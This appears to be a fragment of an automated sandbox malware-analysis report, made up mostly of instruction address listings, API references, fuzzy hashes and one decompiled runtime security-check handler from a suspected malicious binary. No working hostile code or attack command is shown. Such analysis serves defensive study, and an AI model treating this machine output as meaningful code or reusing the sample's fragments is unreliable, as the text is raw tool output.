                                                          0x00403ca6
                                                          0x00403ca6
                                                          0x00403ca8
                                                          0x00403cb2
                                                          0x00403cb5
                                                          0x00403cbb
                                                          0x00403cc5
                                                          0x00403cea
                                                          0x00403cef
                                                          0x00403cf4
                                                          0x00403dbb
                                                          0x00000000
                                                          0x00403dbc
                                                          0x00403cf4
                                                          0x00403cc5
                                                          0x00403cfa
                                                          0x00403cfd
                                                          0x00403d00
                                                          0x00403d06
                                                          0x00403d0c
                                                          0x00403d1e
                                                          0x00403d23
                                                          0x00403d26
                                                          0x00403d29
                                                          0x00403d2c
                                                          0x00403d2f
                                                          0x00403d35
                                                          0x00403d3b
                                                          0x00403d3e
                                                          0x00403d41
                                                          0x00403d50
                                                          0x00403d51
                                                          0x00403d51
                                                          0x00403d56
                                                          0x00403d69
                                                          0x00403d6b
                                                          0x00403d70
                                                          0x00403d7b
                                                          0x00403d7d
                                                          0x00403d7f
                                                          0x00403d9b
                                                          0x00403da0
                                                          0x00403da3
                                                          0x00403da3
                                                          0x00403d7b
                                                          0x00403d70
                                                          0x00403da9
                                                          0x00403daa
                                                          0x00403dad
                                                          0x00403db0
                                                          0x00403db3
                                                          0x00403db6
                                                          0x00403d41
                                                          0x00000000
                                                          0x00403d35
                                                          0x00403dc0
                                                          0x00403dc5
                                                          0x00403dc9
                                                          0x00403dcc
                                                          0x00403dcd
                                                          0x00403dce
                                                          0x00403dcf
                                                          0x00403dd4
                                                          0x00403e4c
                                                          0x00403e4e
                                                          0x00403dd6
                                                          0x00403dd6
                                                          0x00403ddc
                                                          0x00000000
                                                          0x00403dde
                                                          0x00403de1
                                                          0x00403de4
                                                          0x00403deb
                                                          0x00403dee
                                                          0x00403df2
                                                          0x00403e24
                                                          0x00403e27
                                                          0x00403e2e
                                                          0x00403e34
                                                          0x00403e3e
                                                          0x00403e47
                                                          0x00403e47
                                                          0x00403e3e
                                                          0x00403e34
                                                          0x00403e48
                                                          0x00403df4
                                                          0x00403df4
                                                          0x00403df4
                                                          0x00403df7
                                                          0x00403df7
                                                          0x00403dfb
                                                          0x00000000
                                                          0x00000000
                                                          0x00403dff
                                                          0x00403e13
                                                          0x00403e13
                                                          0x00403e01
                                                          0x00403e01
                                                          0x00403e07
                                                          0x00000000
                                                          0x00403e09
                                                          0x00403e09
                                                          0x00403e0c
                                                          0x00403e11
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e11
                                                          0x00403e07
                                                          0x00403e1c
                                                          0x00403e1e
                                                          0x00000000
                                                          0x00403e20
                                                          0x00403e20
                                                          0x00403e20
                                                          0x00000000
                                                          0x00403e1e
                                                          0x00403e17
                                                          0x00403e19
                                                          0x00000000
                                                          0x00403e19
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403de4
                                                          0x00403ddc
                                                          0x00403e4f
                                                          0x00403e53
                                                          0x00403e53

                                                          APIs
                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00403CB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: EncodePointer
                                                          • String ID: MOC$RCC
                                                          • API String ID: 2118026453-2084237596
                                                          • Opcode ID: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                                                          • Instruction ID: 27d9d21774ce73f4523aea127e5a37313707127f13db8d93af602d3374e0ea50
                                                          • Opcode Fuzzy Hash: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                                                          • Instruction Fuzzy Hash: E9415B72900109EFCF16DF94CE81AEEBBB9BF48305F1840AAF905B7291D3399A50DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E004018D4(void* __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                          				intOrPtr _v0;
                                                          				void* _v808;
                                                          				int _t10;
                                                          				intOrPtr _t15;
                                                          				signed int _t16;
                                                          				signed int _t18;
                                                          				signed int _t20;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t24;
                                                          				intOrPtr _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr _t28;
                                                          				intOrPtr _t29;
                                                          				intOrPtr* _t31;
                                                          				intOrPtr* _t33;
                                                          				void* _t36;
                                                          
                                                          				_t29 = __esi;
                                                          				_t28 = __edi;
                                                          				_t27 = __edx;
                                                          				_t24 = __ecx;
                                                          				_t23 = __ebx;
                                                          				_t36 = _t24 -  *0x415010; // 0x93c85c54
                                                          				if(_t36 != 0) {
                                                          					_t31 = _t33;
                                                          					_t10 = IsProcessorFeaturePresent(0x17);
                                                          					if(_t10 != 0) {
                                                          						_t24 = 2;
                                                          						asm("int 0x29");
                                                          					}
                                                          					 *0x415a48 = _t10;
                                                          					 *0x415a44 = _t24;
                                                          					 *0x415a40 = _t27;
                                                          					 *0x415a3c = _t23;
                                                          					 *0x415a38 = _t29;
                                                          					 *0x415a34 = _t28;
                                                          					 *0x415a60 = ss;
                                                          					 *0x415a54 = cs;
                                                          					 *0x415a30 = ds;
                                                          					 *0x415a2c = es;
                                                          					 *0x415a28 = fs;
                                                          					 *0x415a24 = gs;
                                                          					asm("pushfd");
                                                          					_pop( *0x415a58);
                                                          					 *0x415a4c =  *_t31;
                                                          					 *0x415a50 = _v0;
                                                          					 *0x415a5c =  &_a4;
                                                          					 *0x415998 = 0x10001;
                                                          					_t15 =  *0x415a50; // 0x0
                                                          					 *0x415954 = _t15;
                                                          					 *0x415948 = 0xc0000409;
                                                          					 *0x41594c = 1;
                                                          					 *0x415958 = 1;
                                                          					_t16 = 4;
                                                          					 *((intOrPtr*)(0x41595c + _t16 * 0)) = 2;
                                                          					_t18 = 4;
                                                          					_t25 =  *0x415010; // 0x93c85c54
                                                          					 *((intOrPtr*)(_t31 + _t18 * 0 - 8)) = _t25;
                                                          					_t20 = 4;
                                                          					_t26 =  *0x415014; // 0x6c37a3ab
                                                          					 *((intOrPtr*)(_t31 + (_t20 << 0) - 8)) = _t26;
                                                          					return E00401F2A("HYA");
                                                          				} else {
                                                          					return __eax;
                                                          				}
                                                          			}




















                                                          0x004018d4
                                                          0x004018d4
                                                          0x004018d4
                                                          0x004018d4
                                                          0x004018d4
                                                          0x004018d4
                                                          0x004018da
                                                          0x00401f53
                                                          0x00401f5d
                                                          0x00401f65
                                                          0x00401f69
                                                          0x00401f6a
                                                          0x00401f6a
                                                          0x00401f6c
                                                          0x00401f71
                                                          0x00401f77
                                                          0x00401f7d
                                                          0x00401f83
                                                          0x00401f89
                                                          0x00401f8f
                                                          0x00401f96
                                                          0x00401f9d
                                                          0x00401fa4
                                                          0x00401fab
                                                          0x00401fb2
                                                          0x00401fb9
                                                          0x00401fba
                                                          0x00401fc3
                                                          0x00401fcb
                                                          0x00401fd3
                                                          0x00401fde
                                                          0x00401fe8
                                                          0x00401fed
                                                          0x00401ff2
                                                          0x00401ffc
                                                          0x00402006
                                                          0x00402012
                                                          0x00402016
                                                          0x00402022
                                                          0x00402026
                                                          0x0040202c
                                                          0x00402032
                                                          0x00402036
                                                          0x0040203c
                                                          0x0040204b
                                                          0x004018dc
                                                          0x004018dc
                                                          0x004018dc

                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401F5D
                                                          • ___raise_securityfailure.LIBCMT ref: 00402045
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                          • String ID: HYA
                                                          • API String ID: 3761405300-3949630065
                                                          • Opcode ID: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                                                          • Instruction ID: 6cb4d069ac1d3707beaa45bb2dd9a615a7934397750866ae2a5b0aac751b91a7
                                                          • Opcode Fuzzy Hash: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                                                          • Instruction Fuzzy Hash: 662103B56A1A01DBD310DF55F9D6AC43BA0BF88394F50D23AE5098ABB0D3B45880CF4E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%